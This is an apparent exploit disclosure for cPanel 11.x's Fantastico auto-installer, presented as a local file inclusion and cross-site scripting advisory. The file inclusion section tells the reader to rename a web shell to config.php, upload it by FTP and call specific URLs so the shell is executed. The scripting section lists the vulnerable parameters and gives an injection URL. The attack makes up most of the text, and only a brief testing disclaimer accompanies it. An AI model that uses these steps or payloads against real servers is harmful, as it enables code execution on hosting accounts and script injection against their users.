----------------------------------------------------------------
Script : Cpanel 11.x
Type : Local File Inclusion & Cross Site Scripting
Risk : High
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
**** I am 17 Years Old ****
My Official Website : http://FEREIDANI.IR
Team Website : http://IRCRASH.COM
Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------
Local File Inclusion Vulnerability :
Note : Rename your shell to config.php and upload with your ftp account in ./ directory .... , now login in cpanel and
enter vulnerable address in url ....
https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/
https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/
https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/
----------------------------------------------------------------
Cross site scripting :
File Address : frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4
Set Action as Upgrade%20to%201.7.4
Vulnerable Variables :
$localapp
$updatedir
$scriptpath_show
$domain_show
$thispage
$thisapp
$currentversion
For Example : https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E
----------------------------------------------------------------
Tnx : God
http://IRCRASH.COM http://FEREIDANI.IR
----------------------------------------------------------------
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum